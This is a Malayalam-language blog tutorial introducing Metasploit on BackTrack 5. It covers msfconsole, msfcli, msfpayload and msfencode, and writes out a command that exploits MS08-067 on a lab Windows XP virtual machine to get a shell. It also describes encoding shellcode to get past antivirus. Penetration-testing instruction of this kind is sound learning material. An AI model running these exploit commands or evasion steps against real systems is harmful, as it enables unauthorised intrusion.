മെറ്റാസ്പ്ലോയ്റ്റ് ഒരു അവലോകനം

8:44 PM , 0 Comments


 'Penetration testing' എന്ന വാക്ക് ഹാക്കിംഗിനെ പറ്റി കുറച്ചെങ്കിലും അറിവുള്ളവര്‍ക്ക് സുപരിചിതമാണ്. മറ്റൊരു കമ്പ്യൂട്ടറിലെക്കോ കമ്പ്യൂട്ടര്‍ നെറ്റ്വര്‍ക്കിലേക്കോ ഒരു ഹാക്കര്‍ക്ക് നുഴഞ്ഞു കയറാന്‍ സാധിക്കുമോ എന്ന് പരിശോധിക്കുന്ന പ്രക്രിയയെ ആണ് Penetration testing എന്ന് വിളിക്കുന്നത്. ഇതിനായി ഉപയോഗിക്കപ്പെടുന്ന ഏറ്റവും പ്രധാനപ്പെട്ട ഉപകരണങ്ങളില്‍ ഒന്നാണ് മെറ്റാസ്പ്ലോയ്റ്റ്. എങ്കിലും ഒരു തുടക്കക്കാരന് ഈ സോഫ്റ്റ്‌വെയര്‍ വളരെ വിഷമം പടിച്ച ഒന്നായി തോന്നാന്‍ സാധ്യത ഉണ്ട്. ഇതില്‍ നിങ്ങളെ സഹായിക്കുവാനായി ആണ് ഈ ലേഖനം തയ്യാറാക്കിയിരിക്കുന്നത്. ഇതില്‍ കൂടുതലും നാം വിന്‍ഡോസ്‌ കമ്പ്യൂട്ടറുകള്‍ ആണ് ലക്ഷ്യം വെക്കുന്നത്. പക്ഷെ ഒന്നോര്‍ക്കുക: നിങ്ങള്‍ ഇത് വായിച്ച് എന്തു ചെയ്താലും ഞാന്‍ അതിന്‌ ഉത്തരവാദി ആയിരിക്കുന്നതല്ല. ഇവിടെ തന്നിരിക്കുന്ന വിവരങ്ങള്‍ സ്വന്തം അറിവിനായി മാത്രം ഉപയോഗിക്കുക.

നാം മെറ്റാസ്പ്ലോയ്റ്റില്‍ കൂടുതല്‍ ആയി ഉപയോഗിക്കുന്ന ചില വാക്കുകള്‍ ഇവിടെ പരിചയപ്പെടുത്തുന്നു.
Exploit - ഒരു സോഫ്റ്റ്‌വെയറിലെയോ, കമ്പ്യൂട്ടറിലെയോ, നെറ്റ്വര്‍ക്കിലെയോ സുരക്ഷാ പഴുതുകളെ കുറിക്കാന്‍ ഈ പദം ഉപയോഗിക്കുന്നു.

Payload - മെറ്റാസ്പ്ലോയ്റ്റ് ഉപയോഗിച്ച് മറ്റൊരു കമ്പ്യൂട്ടറില്‍ പ്രവര്‍ത്തിപ്പിക്കുന്ന കോഡിനെ സൂചിപ്പിക്കുന്നു.

Module - ഒരു ആക്രമണം നടത്തുവനായി മെറ്റാസ്പ്ലോയ്റ്റ് ഫ്രെയിംവര്‍ക്കിലേക്ക് ചേര്‍ക്കുന്ന ഒരു ചെറിയ കോഡ്‌.

Shellcode - പേലോഡ് ആയി ഉപയോഗിക്കപ്പെടുന്ന ഒരു ചെറിയ code.

MSFconsole

മെറ്റാസ്പ്ലോയ്റ്റിലൂടെയുള്ള മിക്കവാറും എല്ലാ പ്രവര്‍ത്തനങ്ങളും നാം ചെയ്യുന്നത് ഈ വിന്‍ഡോയിലൂടെ ആയിരിക്കും. ഇത് ആക്രമണങ്ങള്‍ നടത്താനും കൂടാതെ മറ്റു പല ആവശ്യങ്ങള്‍ക്കും ഉപയോഗിക്കുന്നു. ഈ ലേഖനത്തിലുടനീളം നാം Msfconsole നാം ഉപയോഗിക്കുന്നതായിരിക്കും. ഉപയോഗിക്കുന്തോറും അതില്‍ കൂടുതല്‍ പ്രാവീണ്യം നേടാന്‍ നിങ്ങള്‍ക്കാകും. മെറ്റാസ്പ്ലോയ്റ്റ് ബാക്ക്‌ട്രാക്ക് 5ല്‍ ഇന്‍സ്റ്റോള്‍ ചെയ്യപ്പെട്ടിട്ടുണ്ട്. Msfconsole എടുക്കുവാനായി, നിങ്ങളുടെ ബാക്ക്‌ട്രാക്കിലെ console തുറന്നു താഴെ കാണുന്ന command ടൈപ്പ് ചെയ്യുക:


root@bt: ~# cd /opt/framework3/msf3/
root@bt: ~#/opt/framework3/msf3# msfconsole
ഏതാനും നിമിഷങ്ങള്‍ക്കുള്ളില്‍ Msfconsole പ്രത്യക്ഷപ്പെടും.





ഇവിടെ സഹായം ആവശ്യമാണെങ്കില്‍ help എന്ന് ടൈപ്പ് ചെയ്തതിനുശേഷം command ടൈപ്പ് ചെയ്യുക.
ഉദാഹരണം: msf > help connect

MSFcli

മെറ്റാസ്പ്ലോയ്റ്റ് ഉപയോഗിക്കുവാനുള്ള മറ്റൊരു ഇന്റര്‍ഫേസ് ആണ് MSFcli. MSFconsole പോലെതന്നെ ഇതുപയോഗിച്ചും മെറ്റാസ്പ്ലോയ്റ്റ് പ്രവര്‍ത്തിപ്പിക്കുവാന്‍ സാധിക്കും. മറ്റ് console അധിഷ്ടിത ടൂള്‍സ് ഉപയോഗിക്കാന്‍ MSFcli ആണ് ഉചിതം. MSFcli തുറക്കുവാനായി നിങ്ങളുടെ ബാക്ക്‌ട്രാക്കിലെ console തുറന്നു താഴെ കാണുന്ന command ടൈപ്പ് ചെയ്യുക:


root@bt:~# cd /opt/framework3/msf3
root@bt:~# msfcli -h



ഇനി നമുക്ക് MSFcliയുടെ പ്രവര്‍ത്തനംനോക്കാം.മെറ്റാസ്പ്ലോയ്റ്റ് ഉപയോഗിക്കുമ്പോള്‍ എന്തെങ്കിലും തടസ്സം നേരിട്ടാല്‍ command ടൈപ്പ് ചെയ്യുന്നതിന്റെ അവസാനം O എന്ന് ചേര്‍ത്താല്‍ അതിന്റെ options കാണാന്‍ കഴിയും.


ഉദാഹരണം:  root@bt:~# msfcli windows/smb/ms08_067_netapt o

 
ഇവിടെ കാണിച്ചിരിക്കുന്ന moduleല്‍ മൂന്ന്‍ ഓപ്‌ഷനുകള്‍ ആണ് ഉള്ളത്. RHOST, RPORT, SMPIPE എന്നിവ.Commandന്‍റെ അവസാനഭാഗത്ത്‌  'P' എന്ന്ചേര്‍ക്കുമ്പോള്‍, ഇവിടെ ഉപയോഗിക്കാവുന്ന പേലോഡ്കളുടെ ഒരു ലിസ്റ്റ് കാണാന്‍കഴിയും.
ഉദാഹരണം: root@bt~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 P



ഇവിടെനിന്ന് ഒരു പേലോഡ് തിരഞ്ഞെടുത്ത് നമുക്ക് നമ്മുടെ exploit റണ്‍ ചെയ്യാന്‍ സാധിക്കും. അതിനായി ഓപ്‌ഷന്‍സ് കൊടുത്ത ശേഷം, commandന്‍റെ കൂടെ 'E' എന്ന് ടൈപ്പ് ചെയ്യുക. അതായത് 


root@bt~# msfcli windows/smb/ms08_067_netapi RHOST=192.168.56.101 PAYLOAD=windows/shell/bind_tcp E

ഇവിടെ RHOSTല്‍ കൊടുത്തിരിക്കുന്ന ഐപി അഡ്രസ്‌, അതേ കമ്പ്യൂട്ടറില്‍ തന്നെ പ്രവര്‍ത്തിക്കുന്ന ഒരു വിന്‍ഡോസ്‌ എക്സ് പി Virtual Machineന്റെതാണ്. ഈ Virtual Machine ആണ് നാം ടെസ്റ്റ്‌ ചെയ്യുന്നത്. നിങ്ങള്‍ക്ക് ഇതിന്റെ സ്ഥാനത്ത് മറ്റൊരു കമ്പ്യൂട്ടര്‍ ഉപയോഗിക്കാവുന്നതാണ്.  പഠിക്കുവാനായി ചെയ്യുമ്പോള്‍ Virtual Machine അപ്ഡേറ്റ് ചെയ്യാതിരിക്കാനും ആന്റി വൈറസ്‌ ഉപയോഗിക്കാതിരിക്കാനും ശ്രദ്ധിക്കുക. കാരണം അവ ഉണ്ടെങ്കില്‍ സുരക്ഷാ പഴുതുകള്‍ അടക്കപ്പെടനും നമ്മുടെ പ്രവൃത്തി കൂടുതല്‍ ദുഷ്കരമായിത്തീരാനും സാധ്യത ഉണ്ട്.

 മെറ്റാസ്പ്ലോയ്റ്റിന്റെ ഗ്രാഫിക്കല്‍ യൂസര്‍ ഇന്റര്‍ഫേസ് (GUI) ആണ് Armitage. ഇത് തുറക്കുവാനായി armitage എന്ന command റണ്‍ ചെയ്യുക. അതിനുശേഷം Start MSF തിരഞ്ഞെടുക്കുക.




MSFpayload

Shellcode കളും മറ്റും നിര്‍മിക്കുന്ന മെറ്റാസ്പ്ലോയ്റ്റ്ലെ ഒരു ഭാഗമാണ്  MSFpayload. C, റൂബി, ജാവാ സ്ക്രിപ്റ്റ്, വിഷ്വല്‍ ബേസിക് എന്നിങ്ങനെ പല രൂപങ്ങളില്‍ Shellcode നിര്‍മിക്കാവുന്നതാണ്. വ്യത്യസ്ത സാഹചര്യങ്ങളില്‍ ഈ വ്യത്യസ്ത പല സാഹചര്യങ്ങളില്‍ ഉപയോഗപ്രദമാണ്. MSFpayload സഹായത്തിനായി താഴെ കാണുന്ന command ഉപയോഗിക്കുക.


root@bt:~# msfpayload -h

MSFcli പോലെതന്നെ ഓപ്‌ഷനുകള്‍ കാണുവാനായി command ടൈപ്പ് ചെയ്യുന്നതിന്റെ അവസാനം O എന്ന് ചേര്‍ക്കുക. 


root@bt:~# msfpayload windows/shell_reverse_tcp O

MSFencode

MSFpayload ഉപയോഗിച്ച് നിര്‍മിക്കുന്ന ഷെല്‍കോഡുകള്‍ മറ്റൊരു കമ്പ്യൂട്ടറില്‍ എത്തിച്ചേരുമ്പോള്‍ അതിലുള്ള ആന്റി വൈറസ്‌ അല്ലെങ്കില്‍ മറ്റു സുരക്ഷാ സോഫ്റ്റ്‌വെയറുകള്‍ അത് കണ്ടെത്തുകയും, ഈ ഷെല്‍കോഡിന്റെ പ്രവര്‍ത്തനം തടസ്സപ്പെടുത്തുകയും ചെയ്യാന്‍ സാധ്യത ഉണ്ട്. ഇതിനു പരിഹാരമായാണ് MSFencode നിര്‍മിച്ചിരിക്കുന്നത്. ഇത് ഉപയോഗിക്കുമ്പോള്‍ നമ്മുടെ ഷെല്‍കോഡ് മറ്റൊരു കമ്പ്യൂട്ടറിലേക്ക് അയക്കുന്നതിനുമുന്പ് പ്രത്യേക രീതിയില്‍ കോഡ് ചെയ്യുന്നു.വ്യത്യസ്ത തരം കോഡിങ്ങുകള്‍ കാണുവാനായി ഈ command ഉപയോഗിക്കുക.
root@bt:~# msfencode -l
സഹായത്തിനായി ഈ command ഉപയോഗിക്കുക.
root@bt:~# msfencode -h



ഈ പോസ്റ്റ്‌ നിങ്ങള്ക്ക് പ്രയോജനപ്രദമായി എന്ന് വിശ്വസിക്കുന്നു. ദയവായി അഭിപ്രായങ്ങള്‍ താഴെ രേഖപ്പെടുത്തുക.

Melbin

Founder and Editor-in-chief of 'XyberSec', I am Security Researcher and Self Proclaimed Hacker, with experience in various aspects of Internet Security. Strong supporter of Anonymous Hackers. Google

0 comments: